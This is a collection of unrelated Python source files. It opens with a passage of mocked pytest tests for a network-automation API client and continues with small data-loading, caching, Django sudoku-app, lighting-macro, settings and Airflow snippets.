resp=json.dumps(""),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_path}",
status=200,
resp=json.dumps(
{"type": "ip", "name": f"sz:{sz_id},{group_name}", "pool_ids": [pool_id]}
),
)
resp = aos_logged_in.blueprint.create_security_zone(
bp_id=bp_id,
name=sz_name,
import_policy="all",
leaf_loopback_ip_pools=[pool_id],
dhcp_servers=["1.1.1.1"],
)
sz_dict = deserialize_fixture(sz_fixture)
assert resp == SecurityZone(
label=sz_name,
id=sz_dict["id"],
routing_policy=mock.ANY,
routing_policy_id=mock.ANY,
vni_id=sz_dict["vni_id"],
sz_type=sz_dict["sz_type"],
vrf_name=sz_dict["vrf_name"],
rt_policy=sz_dict["rt_policy"],
route_target=sz_dict["route_target"],
vlan_id=sz_dict["vlan_id"],
)
def test_get_virtual_network_id(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
vn_fixture = f"aos/{aos_api_version}/blueprints/get_virtual_network_id.json"
bp_id = "evpn-cvx-virtual"
vn_name = "test-blue15"
vn_id = "307944e0-8aa5-4108-9253-0c453a653bde"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
status=200,
resp=read_fixture(vn_fixture),
)
vn_dict = deserialize_fixture(vn_fixture)
assert aos_logged_in.blueprint.get_virtual_network(
bp_id=bp_id, vn_id=vn_id
) == VirtualNetwork(
label=vn_name,
id=vn_id,
description=None,
ipv4_enabled=vn_dict["ipv4_enabled"],
ipv4_subnet=vn_dict["ipv4_subnet"],
virtual_gateway_ipv4=vn_dict["virtual_gateway_ipv4"],
ipv6_enabled=False,
ipv6_subnet=None,
virtual_gateway_ipv6=None,
vn_id=vn_dict["vn_id"],
security_zone_id=vn_dict["security_zone_id"],
svi_ips=vn_dict["svi_ips"],
virtual_mac=vn_dict["virtual_mac"],
default_endpoint_tag_types={},
endpoints=vn_dict["endpoints"],
bound_to=vn_dict["bound_to"],
vn_type=vn_dict["vn_type"],
rt_policy=vn_dict["rt_policy"],
dhcp_service=vn_dict["dhcp_service"],
tagged_ct=False,
untagged_ct=False,
)
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_get_virtual_network_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
vn_fixture = f"aos/{aos_api_version}/blueprints/get_virtual_network_id.json"
all_fixture = f"aos/{aos_api_version}/blueprints/get_virtual_networks.json"
bp_id = "evpn-cvx-virtual"
vn_name = "test-blue15"
vn_id = "307944e0-8aa5-4108-9253-0c453a653bde"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks",
status=200,
resp=read_fixture(all_fixture),
)
vn_dict = deserialize_fixture(vn_fixture)
assert aos_logged_in.blueprint.find_vn_by_name(
bp_id=bp_id, name=vn_name
) == VirtualNetwork(
label=vn_name,
id=vn_id,
description=None,
ipv4_enabled=vn_dict["ipv4_enabled"],
ipv4_subnet=vn_dict["ipv4_subnet"],
virtual_gateway_ipv4=vn_dict["virtual_gateway_ipv4"],
ipv6_enabled=False,
ipv6_subnet=None,
virtual_gateway_ipv6=None,
vn_id=vn_dict["vn_id"],
security_zone_id=vn_dict["security_zone_id"],
svi_ips=mock.ANY,
virtual_mac=vn_dict["virtual_mac"],
default_endpoint_tag_types={},
endpoints=mock.ANY,
bound_to=vn_dict["bound_to"],
vn_type=vn_dict["vn_type"],
rt_policy=vn_dict["rt_policy"],
dhcp_service=vn_dict["dhcp_service"],
tagged_ct=False,
untagged_ct=False,
)
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_create_virtual_network(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
vn_fixture = f"aos/{aos_api_version}/blueprints/get_virtual_network_id.json"
sz_all_fixture = f"aos/{aos_api_version}/blueprints/get_security_zones.json"
bp_id = "evpn-cvx-virtual"
sz_name = "blue"
sz_id = "78eff7d7-e936-4e6e-a9f7-079b9aa45f98"
vn_id = "307944e0-8aa5-4108-9253-0c453a653bde"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
status=200,
resp=read_fixture(sz_all_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks",
status=202,
params=None,
resp=json.dumps({"id": vn_id}),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
status=200,
resp=read_fixture(vn_fixture),
)
aos_logged_in.blueprint.create_virtual_network(
bp_id=bp_id,
name="blue-test1",
bound_to=mock.ANY,
sz_name=sz_name,
)
bound_to = deserialize_fixture(vn_fixture)["bound_to"]
expected_body = {
"label": "blue-test1",
"security_zone_id": sz_id,
"vn_type": "vxlan",
"vn_id": None,
"bound_to": bound_to,
"ipv4_enabled": True,
"dhcp_service": "dhcpServiceEnabled",
"ipv4_subnet": None,
"ipv4_gateway": None,
}
aos_session.request.assert_has_calls(
[
call(
"POST",
"http://aos:80/api/aaa/login",
json=mock.ANY,
params=None,
headers=mock.ANY,
),
call(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
params=None,
json=None,
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks",
params=None,
json=expected_body,
headers=mock.ANY,
),
call(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
params=None,
json=None,
headers=mock.ANY,
),
call(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
params=None,
json=None,
headers=mock.ANY,
),
]
)
def test_apply_configlet(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
conf_id = "test-conf-id"
conf_fixture = f"aos/{aos_api_version}/design/get_configlet_id.json"
conf_role = ["spine", "leaf"]
aos_session.add_response(
"GET",
f"http://aos:80/api/design/configlets/{conf_id}",
status=200,
resp=read_fixture(conf_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/configlets",
status=202,
resp=json.dumps({"id": conf_id}),
)
resp_payload = {"id": conf_id}
assert (
aos_logged_in.blueprint.apply_configlet(
bp_id=bp_id, configlet_id=conf_id, role=conf_role
)
== resp_payload
)
conf_dict = deserialize_fixture(conf_fixture)
json_body = {
"configlet": conf_dict,
"label": conf_dict["display_name"],
"condition": f"role in {conf_role}",
}
aos_session.request.assert_called_with(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/configlets",
params=None,
json=json_body,
headers=expected_auth_headers,
)
def test_apply_configlet_invalid_roles(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
conf_id = "test-conf-id"
conf_fixture = f"aos/{aos_api_version}/design/get_configlet_id.json"
aos_session.add_response(
"GET",
f"http://aos:80/api/design/configlets/{conf_id}",
status=200,
resp=read_fixture(conf_fixture),
)
with pytest.raises(AosInputError):
aos_logged_in.blueprint.apply_configlet(bp_id=bp_id, configlet_id=conf_id)
aos_session.request.assert_called_with(
"GET",
f"http://aos:80/api/design/configlets/{conf_id}",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_apply_configlet_combined_conditions(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
conf_id = "test-conf-id"
conf_fixture = f"aos/{aos_api_version}/design/get_configlet_id.json"
conf_role = ["spine", "leaf"]
conf_ids = ["foo", "bar", "monkey"]
aos_session.add_response(
"GET",
f"http://aos:80/api/design/configlets/{conf_id}",
status=200,
resp=read_fixture(conf_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/configlets",
status=202,
resp=json.dumps({"id": conf_id}),
)
resp_payload = {"id": conf_id}
assert (
aos_logged_in.blueprint.apply_configlet(
bp_id=bp_id, configlet_id=conf_id, role=conf_role, system_id=conf_ids
)
== resp_payload
)
conf_dict = deserialize_fixture(conf_fixture)
json_body = {
"configlet": conf_dict,
"label": conf_dict["display_name"],
"condition": f"role in {conf_role} and id in {conf_ids}",
}
aos_session.request.assert_called_with(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/configlets",
params=None,
json=json_body,
headers=expected_auth_headers,
)
def test_apply_property_set(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
ps_id = "test-ps-id"
ps_fixture = f"aos/{aos_api_version}/design/get_property_set_id.json"
aos_session.add_response(
"GET",
f"http://aos:80/api/property-sets/{ps_id}",
status=200,
resp=read_fixture(ps_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/property-sets",
status=202,
resp=json.dumps({"id": ps_id}),
)
resp_payload = {"id": ps_id}
assert (
aos_logged_in.blueprint.apply_property_set(bp_id=bp_id, ps_id=ps_id)
== resp_payload
)
ps_dict = deserialize_fixture(ps_fixture)
    ps_keys = list(ps_dict["values"])  # all keys defined in the property set
json_body = {"keys": ps_keys, "id": ps_dict["id"]}
aos_session.request.assert_called_with(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/property-sets",
params=None,
json=json_body,
headers=expected_auth_headers,
)
def test_apply_property_set_keys(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
ps_id = "test-ps-id"
ps_fixture = f"aos/{aos_api_version}/design/get_property_set_id.json"
ps_keys = ["ntp_server"]
aos_session.add_response(
"GET",
f"http://aos:80/api/property-sets/{ps_id}",
status=200,
resp=read_fixture(ps_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/property-sets",
status=202,
resp=json.dumps({"id": ps_id}),
)
resp_payload = {"id": ps_id}
assert (
aos_logged_in.blueprint.apply_property_set(
bp_id=bp_id, ps_id=ps_id, ps_keys=ps_keys
)
== resp_payload
)
ps_dict = deserialize_fixture(ps_fixture)
json_body = {"keys": ps_keys, "id": ps_dict["id"]}
aos_session.request.assert_called_with(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/property-sets",
params=None,
json=json_body,
headers=expected_auth_headers,
)
def test_assign_interface_map_by_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
node_name = ["spine1", "spine2"]
im_name = "Cumulus_VX__slicer-7x10-1"
node_fixture = f"aos/{aos_api_version}/blueprints/get_bp_nodes.json"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/nodes?node_type=system",
status=200,
resp=read_fixture(node_fixture),
)
aos_session.add_response(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/interface-map-assignments",
status=204,
resp=json.dumps({"id": im_name}),
)
test_json = {
"assignments": {
"83a3a17e-e2f1-4027-ae3c-ebf56dcfaaf5": im_name,
"1717ee47-f0be-4877-8341-18709048e237": im_name,
}
}
assert (
aos_logged_in.blueprint.assign_interface_map_by_name(
bp_id=bp_id, node_names=node_name, im_name=im_name
)
== test_json
)
aos_session.request.assert_called_with(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/interface-map-assignments",
params=None,
json=test_json,
headers=expected_auth_headers,
)
def test_apply_external_router_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
if aos_api_version != "3.3.0":
pytest.skip("External Router not present in 4.0.0+")
bp_id = "evpn-cvx-virtual"
bp_rtr_name = "example_router1"
bp_rtr_id = "92797c82-ff36-4575-9fe2-9e84d998c7b7"
ext_rtr_fixture = f"aos/{aos_api_version}/external_systems/get_ext_rtrs.json"
ext_rlinks = f"aos/{aos_api_version}/blueprints/get_ext_rlinks.json"
ext_rlinks_id = f"aos/{aos_api_version}/blueprints/get_ext_rlinks_id.json"
bp_ext_rtr_fixture = f"aos/{aos_api_version}/blueprints/get_bp_ext_rtr.json"
aos_session.add_response(
"GET",
"http://aos:80/api/resources/external-routers",
status=200,
resp=read_fixture(ext_rtr_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/external-routers",
status=200,
resp=json.dumps({"id": bp_rtr_id}),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/external-router-links",
status=200,
resp=read_fixture(ext_rlinks),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/external-router-links/{bp_rtr_id}",
status=200,
resp=read_fixture(ext_rlinks_id),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/external-routers/{bp_rtr_id}",
status=204,
resp=json.dumps({"id": bp_rtr_id}),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/external-router-links/{bp_rtr_id}",
status=204,
resp=json.dumps({"id": bp_rtr_id}),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/external-routers/{bp_rtr_id}",
status=200,
resp=read_fixture(bp_ext_rtr_fixture),
)
resp = aos_logged_in.blueprint.apply_external_router(
bp_id=bp_id, ext_rtr_name=bp_rtr_name
)
assert resp == bp_rtr_id
def test_get_anomalies_list_clear(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/anomalies",
status=200,
params={"exclude_anomaly_type": []},
resp=json.dumps({"items": [], "count": 0}),
)
assert aos_logged_in.blueprint.anomalies_list(bp_id=bp_id) == []
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/anomalies",
params={"exclude_anomaly_type": []},
json=None,
headers=expected_auth_headers,
)
def test_get_anomalies_list(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
a_fixture = f"aos/{aos_api_version}/blueprints/bp_anomalies.json"
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/anomalies",
status=200,
params={"exclude_anomaly_type": []},
resp=read_fixture(a_fixture),
)
expected = [
Anomaly(
type="config",
id="c43fcab1-0c74-4b2c-85de-c0cda9c32bd7",
system_id="525400CFDEB3",
severity="critical",
)
]
assert aos_logged_in.blueprint.anomalies_list(bp_id=bp_id) == expected
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/anomalies",
params={"exclude_anomaly_type": []},
json=None,
headers=expected_auth_headers,
)
def test_get_all_tor_nodes(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
node_fixture = f"aos/{aos_api_version}/blueprints/qe_get_nodes.json"
rd_node_fixture = f"aos/{aos_api_version}/blueprints/qe_get_rd_nodes.json"
bp_id = "evpn-cvx-virtual"
mlag_node1 = "d704d6f7-6070-4fef-ae99-99a94e08bf62"
mlag_node2 = "ef9b2dfb-3e12-4f73-8ec5-7c23911f3b99"
single_node = "9e75966c-bfad-4ed1-83f9-282f552b24b2"
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
params=None,
resp=read_fixture(node_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
params=None,
resp=read_fixture(rd_node_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
params=None,
resp=read_fixture(rd_node_fixture),
)
assert aos_logged_in.blueprint.get_all_tor_nodes(bp_id)
aos_session.request.assert_has_calls(
[
call(
"POST",
"http://aos:80/api/aaa/login",
json=mock.ANY,
params=None,
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
params=None,
json={"query": "match(node('system', name='leaf', role='leaf'))"},
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
params=None,
json={
"query": "match(node('redundancy_group', name='rg')"
".out('composed_of_systems')"
".node('system', role='leaf',"
f" id='{mlag_node1}'))"
},
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
params=None,
json={
"query": "match(node('redundancy_group', name='rg')"
".out('composed_of_systems')"
".node('system', role='leaf',"
f" id='{single_node}'))"
},
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
params=None,
json={
"query": "match(node('redundancy_group', name='rg')"
".out('composed_of_systems')"
".node('system', role='leaf',"
f" id='{mlag_node2}'))"
},
headers=mock.ANY,
),
]
)
def test_get_active_tasks_none(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/tasks",
params={"filter": "status in ['init', 'in_progress']"},
status=200,
resp=json.dumps({"items": []}),
)
resp = aos_logged_in.blueprint.get_active_tasks(bp_id=bp_id)
assert resp == []
def test_get_active_tasks(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/tasks",
params={"filter": "status in ['init', 'in_progress']"},
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_bp_active_tasks.json"
),
)
resp = aos_logged_in.blueprint.get_active_tasks(bp_id=bp_id)
assert resp is not None
for i in resp:
assert i["status"] in ["in_progress", "init"]
def test_get_diff_status(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/diff-status",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_diff_status.json"
),
)
assert aos_logged_in.blueprint.get_diff_status(bp_id=bp_id) == {
"status": "undeployed",
"logical_diff_supported": True,
"deployed_version": 0,
"staging_version": 1,
"cache_diff_supported": True,
"deploy_config_version": 0,
"deploy_status_version": 0,
"operation_version": 0,
"deploy_status": "success",
"deploy_error": None,
}
def test_set_bp_node_label(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
node_id = "node_1"
aos_session.add_response(
"PATCH", f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}", status=202
)
assert not aos_logged_in.blueprint.set_bp_node_label(
bp_id=bp_id, node_id=node_id, label="newlabel"
)
aos_session.request.assert_called_once_with(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}",
json={"label": "newlabel"},
params=None,
headers=expected_auth_headers,
)
def test_set_bp_node_label_with_hostname(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
node_id = "node_1"
aos_session.add_response(
"PATCH", f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}", status=202
)
assert not aos_logged_in.blueprint.set_bp_node_label(
bp_id=bp_id, node_id=node_id, label="newlabel", hostname="newhostname"
)
aos_session.request.assert_called_once_with(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}",
json={"label": "newlabel", "hostname": "newhostname"},
params=None,
headers=expected_auth_headers,
)
def test_get_cable_map(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/cabling-map",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_cabling_map.json"
),
)
resp = aos_logged_in.blueprint.get_cabling_map(bp_id=bp_id)
assert resp["version"] == 2
assert len(resp["links"]) == 7
def test_update_cabling_map(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/cabling-map"
"?comment=cabling-map-update",
status=202,
)
assert not aos_logged_in.blueprint.update_cabling_map(bp_id=bp_id, links=[])
aos_session.request.assert_called_once_with(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/cabling-map"
"?comment=cabling-map-update",
json={"links": []},
params=None,
headers=expected_auth_headers,
)
def test_get_rendered_config(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
node_id = "node-1"
config_type = "staging"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}/"
f"config-rendering?type={config_type}",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_rendered_config.json"
),
)
assert aos_logged_in.blueprint.get_rendered_config(
bp_id=bp_id, node_id=node_id, config_type=config_type
) == {"config": "thisistheconfiguration"}
def test_get_endpoint_policies(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
ptype = "staging"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/"
f"experience/web/endpoint-policies?type={ptype}",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_endpoint_policies.json"
),
)
resp = aos_logged_in.blueprint.get_endpoint_policies(bp_id=bp_id)
assert resp["version"] == 1
assert len(resp["endpoint_policies"]) == 0
def test_get_routing_policies(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
bp_type = "staging"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/routing-policies?type={bp_type}",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_routing_policies.json"
),
)
resp = aos_logged_in.blueprint.get_routing_policies(bp_id=bp_id)
assert len(resp["items"]) == 1
assert resp["items"][0]["export_policy"] == {
"spine_leaf_links": True,
"loopbacks": True,
"l2edge_subnets": True,
"static_routes": False,
"l3edge_server_links": True,
}
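# ---------------------------------------------------------------------------
# Hedged sketch (an addition, not part of the original test module): the
# helpers `read_fixture` and `deserialize_fixture` used throughout the tests
# above are assumed to be thin wrappers over a fixture directory. The
# directory layout and names below are assumptions for illustration only.
def _read_fixture_example(relative_path, fixture_dir="tests/fixtures"):
    # Return the raw JSON text so it can be passed straight to add_response(resp=...).
    import os
    with open(os.path.join(fixture_dir, relative_path)) as f:
        return f.read()
def _deserialize_fixture_example(relative_path, fixture_dir="tests/fixtures"):
    # Return the parsed fixture for comparing against model objects.
    import json as _json
    return _json.loads(_read_fixture_example(relative_path, fixture_dir))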
|
import feather
import pandas as pd
def get_df(index):
db = feather.read_dataframe('data/db.feather')
return get_data_df(index, db)
def get_data_df(index, db):
file = db.loc[index]['file']
return feather.read_dataframe('data/{}'.format(file))
def get_df_byname(name):
db = feather.read_dataframe('data/db.feather')
return get_data_df_byname(name, db)
def get_data_df_byname(name, db):
    file = db[db['name'] == name]['file'].iloc[0]  # positional lookup; plain [0] fails when the matching row's index label is not 0
return feather.read_dataframe('data/{}'.format(file))
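# Hedged usage sketch (an addition, not part of the original helpers): the
# db.feather index is assumed to carry 'name' and 'file' columns; the row
# position 0 and the name 'example' below are illustrative only.
if __name__ == '__main__':
    first_df = get_df(0)                  # look a dataset up by row position
    named_df = get_df_byname('example')   # or by its registered name
    print(first_df.shape, named_df.shape)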
|
import cv2
import os, sys
import numpy as np
save_path = 'images/train/'
# Helpful functions #
def save_image(name, img):
if not os.path.exists(save_path):
os.makedirs(save_path)
cv2.imwrite(save_path+name+'.tif', np.array(img, dtype=np.uint8))
def get_api_key():
    # a single command-line argument takes precedence over other sources
    if len(sys.argv) == 2:  # value comparison; 'is' identity checks on ints are unreliable
        print('Reading API key from input argument')
        return sys.argv.pop()
    try:
        from src import credentials
        if hasattr(credentials, 'GOOGLE_MAPS_API_KEY'):
            print('Reading API key from credentials.py')
            return credentials.GOOGLE_MAPS_API_KEY
    except ImportError:
        pass
    if 'GOOGLE_MAPS_API_KEY' in os.environ:
        print('Reading API key from environment')
        return os.environ['GOOGLE_MAPS_API_KEY']
    print('API Key not found.')
    sys.exit(1)
|
import contextlib
import os
import shutil
import tempfile
_cache_root = os.environ.get(
'LINEFLOW_ROOT',
os.path.join(os.path.expanduser('~'), '.cache', 'lineflow'))
@contextlib.contextmanager
def tempdir(**kwargs):
ignore_errors = kwargs.pop('ignore_errors', False)
temp_dir = tempfile.mkdtemp(**kwargs)
try:
yield temp_dir
finally:
shutil.rmtree(temp_dir, ignore_errors=ignore_errors)
def get_cache_root() -> str:
return _cache_root
def set_cache_root(path: str) -> None:
global _cache_root
_cache_root = path
def get_cache_directory(cache_name: str,
create_directory: bool = True) -> str:
path = os.path.join(_cache_root, cache_name)
if create_directory:
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
return path
def cache_or_load_file(path, creator, loader):
if os.path.exists(path):
return loader(path)
try:
os.makedirs(_cache_root)
except OSError:
if not os.path.isdir(_cache_root):
raise RuntimeError('cannot create cache directory')
with tempdir() as temp_dir:
filename = os.path.basename(path)
temp_path = os.path.join(temp_dir, filename)
content = creator(temp_path)
if not os.path.exists(path):
shutil.move(temp_path, path)
return content
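# Hedged usage sketch (an addition, not part of the original module): how
# cache_or_load_file is typically driven. `creator` writes the artifact to a
# temporary path and returns the loaded object; `loader` reads an existing
# cached copy. The cache name and file name below are illustrative.
def _example_cache_usage():
    import pickle
    def creator(temp_path):
        data = {'answer': 42}
        with open(temp_path, 'wb') as f:
            pickle.dump(data, f)
        return data
    def loader(path):
        with open(path, 'rb') as f:
            return pickle.load(f)
    cache_path = os.path.join(get_cache_directory('example'), 'data.pkl')
    return cache_or_load_file(cache_path, creator, loader)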
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render, redirect
from .forms import UploadFileForm
from utils.sudoku_grid import render_sudoku
from solver.solver import solve
from .forms import CreateUserForm
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
import numpy as np
import cv2
def home(request):
return render(request, "home.html", {})
def login_page(request):
form = CreateUserForm()
if request.method == 'POST':
if request.POST.get('submit') == 'register':
form = CreateUserForm(request.POST)
if form.is_valid():
form.save()
return redirect('login')
messages.info(request, 'Failed to register')
elif request.POST.get('submit') == 'login':
username_ = request.POST.get('userName')
pwd = request.POST.get('userPassword')
user = authenticate(request, username=username_, password=pwd)
if user is not None:
login(request, user)
return redirect('home')
else:
messages.info(request, 'Email or password is incorrect')
render(request, "login.html", {'form': form})
return render(request, "login.html", {'form': form})
def logout_user(request):
logout(request)
return redirect('login')
def upload_file(request):
if request.method == 'POST':
sudoku_grid = request.FILES.get("sudokuImage")
form = UploadFileForm(sudoku_grid)
if form.is_valid():
            grid = render_sudoku(cv2.imdecode(np.frombuffer(sudoku_grid.read(), np.uint8), cv2.IMREAD_UNCHANGED))  # frombuffer replaces the deprecated binary-mode fromstring
request.session['grid'] = grid
return HttpResponseRedirect('correct-sudoku-grid')
return render(request, "upload_file.html", {})
def correct_sudoku(request):
grid = request.session['grid']
if request.method == 'POST':
new_grid = request.POST.get("new_grid")
final_grid = np.fromstring(new_grid, sep=',', dtype='int').reshape([9, 9]).tolist()
request.session['grid'] = final_grid
return HttpResponseRedirect('play-sudoku')
return render(request, "correct_grid.html", {'grid': grid})
def play(request):
grid = request.session['grid']
if request.method == 'POST':
final_grid = request.POST.get("final_grid")
final_time = request.POST.get("final_time")
grid_result = np.fromstring(final_grid, sep=',', dtype='int').reshape([9, 9]).tolist()
final_result = solve(np.array(grid))
if final_result.tolist() == grid_result:
request.session['result'] = "success"
else:
request.session['result'] = "fail"
request.session['final_grid'] = grid_result
request.session['solve_grid'] = final_result.tolist()
request.session['final_time'] = final_time
return HttpResponseRedirect('result')
return render(request, "play_sudoku.html", {'grid': grid})
def result(request):
if 'final_time' not in request.session:
return redirect('upload')
timer = request.session['final_time']
user_grid = request.session['final_grid']
result = request.session['result']
solve_grid = request.session['solve_grid']
tps = timer.split(':')[0]
return render(request, "result.html", {'timer': timer, 'result': result, 'solve_grid': solve_grid, 'tps': tps, 'user_grid': user_grid})
|
#===============================================================
# DMXIS Macro (c) 2010 db audioware limited
#===============================================================
found=False
for ch in GetAllSelCh(True):
nm = GetChName(ch).lower()
if nm=="r" or nm=="g" or nm=="b" or nm=="red" or nm=="green" or nm=="blue":
SelectCh(ch, 1)
found=True
else:
SelectCh(ch, 0)
if not found: Message("No RGB channels found!")
|
import os
from pydantic import BaseSettings
# If an environment variable with the same name is set locally, it overrides the value from the env file (verify with printenv)
class Settings(BaseSettings):
HOST: str
PORT: int
DATABASE: str
USERNAME: str
PASSWORD: str
class Config:
env_file = os.path.expanduser('~/.env')
env_file_encoding = 'utf-8'
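# Hedged usage sketch (an addition, not part of the original module):
# instantiating Settings pulls values from ~/.env and the process
# environment; a missing required field raises a pydantic ValidationError.
if __name__ == '__main__':
    settings = Settings()  # assumes ~/.env provides HOST, PORT, DATABASE, USERNAME, PASSWORD
    print(settings.HOST, settings.PORT, settings.DATABASE)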
|
import json
import pathlib
import airflow
import requests
import requests.exceptions as requests_exceptions
from airflow import DAG
from airflow.decorators import dag, task
from airflow.operators.subdag_operator import SubDagOperator
from airflow.operators.bash import BashOperator
from airflow.operators.python import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.example_dags.subdags.subdag import subdag
from airflow.utils import timezone
from datetime import datetime, timedelta
from hms_workflow_platform.core.services import *
from hms_workflow_platform.settings import settings
from hms_workflow_platform.core.common.utils.send_messages import SendToRabbit
from hms_workflow_platform.core.services.query.encounter_query_service import EncounterQueryService
from hms_workflow_platform.core.services.query.patient_query_service import PatientQueryService
from hms_workflow_platform.core.services.query.allergy_query_service import AllergyQueryService
from hms_workflow_platform.core.services.query.practitioner_query_service import PractitionerQueryService
from hms_workflow_platform.core.services.query.appointment_query_service import AppointmentQueryService
from hms_workflow_platform.core.services.query.billing_query_service import BillingQueryService
